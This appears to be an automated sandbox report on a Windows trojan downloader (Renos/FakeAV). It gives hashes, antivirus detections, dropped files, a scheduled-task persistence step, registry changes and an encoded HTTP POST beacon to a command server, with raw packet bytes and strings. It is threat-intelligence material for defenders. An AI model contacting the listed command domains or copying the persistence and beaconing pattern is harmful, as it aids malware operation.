Analysis Date2014-08-06 08:36:53
MD5787f81342859da8d03f7d270649b4f14
SHA1ecd0b636349a42e0e912d12d1f8bae23f7a02dc6

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1f3446fb8e07bdab14402c95ec4624d0 sha1: bb4a233c42669360a97590ffdb8e840b8a3a69e3 size: 7680
Section.data md5: 2b37fa123044075a3c0d409b922bee2e sha1: 182a2871c2b62b931bcb9c0ec5f19bff1f14491b size: 10752
Section.bss md5: 22a2ab68b2f318c84b3d0461ccba56ac sha1: e6230dfd42b4841eb62480cebd9150a6b13d2585 size: 100864
Section.idata md5: 32009447b391a7a2707bc7e07897c308 sha1: 2db551e964853c8758e7d613761d3da15e93e280 size: 4608
Section.rsrc md5: 80ea2caa92fb9de4cadd1a236011d64a sha1: 29f0fc1f37316512e0cba83f395360306317e1c0 size: 4096
Timestamp2009-09-09 01:48:01
VersionLegalCopyright: Copyright © 2010 PC Tools. All rights reserved. P6
InternalName: imagP.exe
FileVersion: 7.0.0.61
CompanyName: videosoft
LegalTrademarks:
Comments:
ProductName: u
ProductVersion: 7.0.0.61
FileDescription: 0Video Component
OriginalFilename: imagP.exe
PEhashab73bed486f238541ca7936c5ffd9b430529f6a2
IMPhash894524e807dc325d6889e01ac0f2d934
AV360 SafeTrojan.Generic.KDV.202242
AVAd-AwareTrojan.Generic.KDV.202242
AVAlwil (avast)Renos-AIG [Drp]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/FakeAlert.KN.gen!Eldorado
AVAvira (antivir)TR/Dldr.Renos.PP.7
AVCA (E-Trust Ino)Win32/Renos.D!generic
AVCAT (quickheal)Trojan.Renos.LN
AVClamAVWin.Trojan.Renos-39
AVDr. WebTrojan.Packed.21448
AVEmsisoftTrojan.Generic.KDV.202242
AVEset (nod32)Win32/Kryptik.NCQ
AVFortinetW32/Krypt.QKV!tr
AVFrisk (f-prot)W32/FakeAlert.KN.gen!Eldorado (generic, not disinfectable)
AVF-SecureTrojan.Generic.KDV.202242
AVGrisoft (avg)Downloader.Generic11.UWO
AVIkarusTrojan-Downloader.SuspectCRC
AVK7Trojan ( 00417b9b1 )
AVKasperskyHoax.Win32.FlashApp.gen
AVMalwareBytesTrojan.Downloader
AVMcafeeDownloader-CEW.ap
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Renos.PT
AVMicroWorld (escan)Trojan.Generic.KDV.202242
AVNormanwinpe/Crypt.AVWT
AVRisingTrojan.Win32.Generic.128685EA
AVSophosMal/FakeAV-IZ
AVSymantecTrojan.FakeAV
AVTrend MicroTROJ_AGENT.SMAH
AVVirusBlokAda (vba32)Trojan.ExpProc.EA

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\WINDOWS\Ojawia.exe
Creates FileC:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates FilePIPE\lsarpc
Creates ProcessC:\WINDOWS\Ojawia.exe
Creates MutexGlobal\{BC9BACEF-649A-45ff-A468-C000D051F283}

Process
↳ C:\WINDOWS\Ojawia.exe

RegistryHKEY_CURRENT_USER\Software\PT25DHYRAW\OhuD ➝
5
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
Creates FileC:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates MutexGlobal\{BC9BACEF-649A-45ff-A468-C000D051F283}

Network Details:

DNS4399.com
Type: A
115.182.52.231
DNSusps.com
Type: A
56.0.134.100
DNSvk.com
Type: A
87.240.131.117
DNSvk.com
Type: A
87.240.131.118
DNSvk.com
Type: A
87.240.143.241
DNStopjer.com
Type: A
31.170.165.149
DNStopsaj.com
Type: A
DNShawfruit.com
Type: A
HTTP POSThttp://topjer.com/1wave.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 31.170.165.149:80

Raw Pcap
0x00000000 (00000)   504f5354 202f3177 6176652e 70687020   POST /1wave.php 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a43 6f6e7465 6e742d54   : */*..Content-T
0x00000030 (00048)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000040 (00064)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000050 (00080)   6e636f64 65640d0a 486f7374 3a20746f   ncoded..Host: to
0x00000060 (00096)   706a6572 2e636f6d 0d0a5573 65722d41   pjer.com..User-A
0x00000070 (00112)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000080 (00128)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000090 (00144)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000a0 (00160)   204e5420 352e3029 0d0a436f 6e74656e    NT 5.0)..Conten
0x000000b0 (00176)   742d4c65 6e677468 3a203330 350d0a43   t-Length: 305..C
0x000000c0 (00192)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x000000d0 (00208)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000e0 (00224)   206e6f2d 63616368 650d0a0d 0a646174    no-cache....dat
0x000000f0 (00240)   613d652f 65367235 4a5a5231 30466977   a=e/e6r5JZR10Fiw
0x00000100 (00256)   6f474c67 35315167 4339686e 6245786f   oGLg51QgC9hnbExo
0x00000110 (00272)   32316174 33614f59 6773552f 484c6b7a   21at3aOYgsU/HLkz
0x00000120 (00288)   66336375 77704474 52737935 2b65305a   f3cuwpDtRsy5+e0Z
0x00000130 (00304)   5a523733 6c455878 7a38547a 5a663678   ZR73lEXxz8TzZf6x
0x00000140 (00320)   33306564 63736477 4d4a4f64 41462f56   30edcsdwMJOdAF/V
0x00000150 (00336)   6a567357 48463045 79377a44 4a57392f   jVsWHF0Ey7zDJW9/
0x00000160 (00352)   73394a45 724a3070 66723832 51593662   s9JErJ0pfr82QY6b
0x00000170 (00368)   38484367 53754e61 55716967 346f5633   8HCgSuNaUqig4oV3
0x00000180 (00384)   4242774b 3274327a 37335247 65795544   BBwK2t2z73RGeyUD
0x00000190 (00400)   6a677375 48467043 4c4f696b 5250534c   jgsuHFpCLOikRPSL
0x000001a0 (00416)   39536a75 50314942 38624b70 6a746d4a   9SjuP1IB8bKpjtmJ
0x000001b0 (00432)   30696733 566d5663 4638616f 4f724252   0ig3VmVcF8aoOrBR
0x000001c0 (00448)   52437964 624b5067 4f69452f 6b7a6a67   RCydbKPgOiE/kzjg
0x000001d0 (00464)   4d764145 436d5643 62664b72 4e653657   MvAECmVCbfKrNe6W
0x000001e0 (00480)   6c486768 6b45546a 2f6b4776 38463630   lHghkETj/kGv8F60
0x000001f0 (00496)   5552444d 50686e34 70644941 44714678   URDMPhn4pdIADqFx
0x00000200 (00512)   42482f34 66663845 72696946 32555977   BH/4ff8EriiF2UYw
0x00000210 (00528)   536c6572 34484378 6777415a 3442       Sler4HCxgwAZ4B


Strings
A.
o
g
..]..<
E..
..`uGc
040904E4
0Video Component
 2010  PC Tools.  All rights reserved. P6
7.0.0.61
&About
BBABORT
BBALL
BBCANCEL
Comments
CompanyName
Copyright 
E&xit
&File
FileDescription
FileVersion
imagP.exe
InternalName
LegalCopyright
LegalTrademarks
MAINMENU(
&Open
OriginalFilename
ProductName
ProductVersion
StringFileInfo
Translation
VarFileInfo
VB33
videosoft
VS_VERSION_INFO
zVlS
%02x)`L
0@;5.G@
07z3;`
$]0A8'r
+0J8Ic
0JahLf
0J@,DT
0uef'L
0X|^e9
0y'JCC
0#z4,Vtd
1a@zXLp 
1i-(:-
?1=,J@
1?Xgign
1zqlRp
]27$Gm
2UHZj6
:33:"$
"*"$33
3333:"$
333333
3333333
$3333333
33333333
33333333?333333
333333333333333333
3333333333333338
333333:"33333338
33333:"$3333338
3333339
333338
33333833
#33338
:*"*"$3338
333838
334C33333338
33B$3333333
34""C33333833
3B""$33333
3:ecYBa
*3Y(1by
486EAfpr 2Pn01
48(ud$
4"*""C3338
4_h6/c3
*4hyS"5qP[
4*>)s>X2z
+4ys`S
5LChBW
5^Pd)F
60#E~M
6yy1N1
7JH,d,
;85Ot^"hrf]
8d1HgI
-8j`AA,
8JT,dx
8'L|$Tu
8&M.[L
8zHLT `
+9'Af^[x
9IQU(eV
}9MZ(8}4
;	{9$)Rd
	9=z4_
$A26r^
A4UDUG
_acmdln
ActivateKeyboardLayout
?Ad#>A
ad$!E,G
AdjustWindowRectEx
A%egr<
aH	l,K
a$L4 D
aLzdL| 
; A}}P
  </application> 
  <application> 
@aSHLWm
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Windows - Setup UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
a z0L@ P
BERIPRD
BJJ,^l
b\Jly``p
bL[|84_
BLd_.M
-BP8z~
b<rLtq
BT|,Xj
BVYA5t
Bv=zRz
_BwHxs
+(B@X+4BTd+@B
"C3338
"C8338
CallWindowProcA
CeHZLz7
CharLowerA
CharLowerBuffA
ChildWindowFromPoint
cj@S.Y 
CompareStringA
</compatibility> 
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> 
cQZ^&y
CreateFileA
CreateMenu
CreatePopupMenu
C:SR%9
Ctn4eh_HmE
|cW{Oc
@/_{Cx
D046u1iLV
^:dAg`
`.data
[Dc>*h
DefMDIChildProcA
DefWindowProcA
DeleteFileA
DestroyCursor
DestroyMenu
*dItxh
DJP,dp
dpFnee
DrawFrameControl
DrawIconEx
DrawTextA
d=,uYt
'Dz'1|*=
DZdqHdh
e9RVS"D#
EiRWQPjH
EnableWindow
EndDialog
EqualRect
"[e#>r
E<_vr}
ExitProcess
`~@>@f?'3
f3NTE#,
f4InK-Y
f6?mzP
>;=FG@
FindFirstFileA
Fmj;pDtO
 Fo0u4
FrameRect
fRQiSP
FVgJbA
\>F&W]
F?>w&O
Fz7zt 
g1 &FI
#\'G7p(
G98b7654Lf:\t
G?CV6i<V
GeftCurU
GetCapture
GetClassLongA
GetClassNameA
GetClipboardData
GetCurrentProcess
GetDateFormatA
GetDCEx
GetDiskFreeSpaceA
GetFullPathNameA
GetKeyNameTextA
GetLocaleInfoA
GetLocalTime
GetMenu
GetMenuItemCount
GetSubMenu
GetSysColorBrush
GetSystemDefaultLangID
GetSystemMenu
GetSystemMetrics
GetWindowTextA
GH7kBA
(gj&D[*^E
GlFL8h
_GobLB@20
GS~2"V
'gSmJ&$
G}vCI$
GZ(ywf
*!h`")
}H98b%
[h^%9YA
h!At>7N[
HeapFree
HEs(ui
h(>+(I`t
<HqYhAY3
hz.38_
*:hZHa
hzlLp 
Hz\Lt |
}!HZOG
,HZPO2
HZ,qTdL
hzU9Lw
(I0aVP?
I|3g8e
I]<bFi
ickCsoun
@.idata
iH#0Kh
$II5$,
IiUNIQSTR
IJcofI
imagP.exe
InflateRect
InitializeCriticalSection
InsertMenuA
iP4fsNy
IqxlgNW
Ir=!=1G
 |IRVH
IsCharLowerA
IsDialogMessageW
.[ITgOS
It|	y6
(@iv0C
IVuqMA
IZ\0JJ
$J0,<H
"J333333
j4hC7EVcJO@24
j]53sy
Ja(,>H
"J"C3333
JD;Fau
jE42`K
J=|=g[
$J,,<h
Jht$DKL
JHvFcnG
>^*jJ?p
j(LD `
j(L< L
jM+0{H>
J*nBk7
@JX,`d
k,9~8|DGU?Ht
kernel32.dll
ki|nYx*a
@kj>oT
KLg%*q
k n`.frdat0z$q
KP1|#@y
(kt)3 
!Kv)K|1`
K<[yNI
l`}8<T
l& !aH
lbIHxp
_LdTwov1MAv
~L $(j
LoadCursorA
LoadIconA
LoadLibraryA
LoadLibraryExA
}lqHn.
l@Qm6t
lstrcpyA
lstrlenW
L,tJPyx`T
LtV93H
Lz\Lx 
LZTBz *@
M1o8iD
m#8Hb^
main.cpl
malloc
m)andLi
%^MBh%H
Md1 gI0
memcpy
memmove
MessageBeep
MG|eXy
mo7&fI
MoveFileExA
MoveWindow
*Mr0S(?
_Mr9bsV_TwMVATk@12
MSVaCP60
MSVCRT.dll
mSWHK6
MtZxVL
MulDi5v
MulDiv
~MU:"M
Mx(z6q
,<M!Z4
^(n($ 
n73Cc;
n!DpXn
N)e9Nu
Nhh9&qYNF
NIz(vWr
~$n(j,
!N LN7'
N}.+'Y{
O0S3SZyW
O<>a7R
ObATDIO
OffsetRect
OLEACUT2{
OmrAKfb
o.O&l<
OOnEsm5
OpenClipboard
OpQpMql
)oQ'r]
_owuIQmGznwjW@24
Ox)h@$X
oY=m%),
P8iA\0
P$8&Wf
>P9Bx~<J
p9sZ3A0
\pb`	ph`a
pcjD5J
PeekMessageA
PGF5f@4
PostMessageA
pu";Kw
pu;msuI
pV KW,4\
Pvy(*t
PZ@qTdD
**+Q)d
-Q dP.2
rC|h,]V
 RdB]a
RegisterClassA
RegisterClipboardFormatA
RemoveMenu
RemovePropA
RE*:o*
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
;rF:D)
r~P``%)
,r PJI%@
@.rsrc
s@&CGO
      </security>
      <security>
SendMessageA
SetCapture
SetClassLongA
SetErrorMode
SetEvent
SetFilePointer
SetFocus
SetHandleCount
SetMenu
SetMenuItemInfoA
SetWindowPlacement
SetWindowPos
SetWindowsHookExA
SetWindowTextA
sk:op+
SL*qvLa
Sm[H$U
sprintf
SRQPjWja
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> 
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> 
swprintf
SXgYonLv146jfj
SystemParametersInfoA
-_*sZt
Ta@Lx9i
tb=^Ix
}tc2V|
tGmxbb
ThdaQdI
    <!--The ID below indicates application support for Windows 7 --> 
    <!--The ID below indicates application support for Windows Vista --> 
This program must be run under Win32
+tI|+E
tigDaI1GtB@12
_T@j D}G
TlIzGM
t.=l\R
%tnBv-
&Tnq*a
TO6*A-
}$:t[ojD
tolower
tpU-uJ9
TranslateMDISysAccel
TranslateMessage
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
t}uY=U'j
t!*"'w
tY4`*}Y{
t;yCZ	
[=tzKf
Tz`Lh p
TzLL> 6
TZtq\dx
U,8Dm+
U-9 $6d
u@/#aHS
u_B^s@DUJ
U;Fa^u1?3
UpdateWindow
user32.dll
(U Sy:f
uvR?VvFi_
!|(uY;
VirtualAllocEx
voN04n
v(u+/	\9D
VvLEeu3c
v>y9} 
Vy(SK.E
!w`~",(
_*@W5|A
W9^?k4v
wcschr
wcscspn
wcstol
(W {;|D
W|qb3v
<WRR)}*(
wrTZ7t#
Wu=Rg>
w	VH49}
xA-4*P
Xchx)/HF
X*|ezw
Xf[YZd
X-!ILo|
x,lJ|ypa
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
xouRt_Qf
xr[0&'
x;S K\
XV<.kV
{#x,|:x >^
x[z8+I	
y`.\1Ws0$
yCla,Z*
yc##XZ
yDnjPJ
_yhLRrFDcWCNP4
_yI!yK
y J0,@X
YJavSL
,Z4~+8J@+
$z8LL X
Z'A|8Z~
&zDL` 
zEgDN{;(}
zfi={Y
Z Jwzy$d,
 z(L0 8
@z\Ld t
@zLLX l
z:MvHb
`zpLx 
@Z,qDd0
Z`&Q/t8
zvPjhn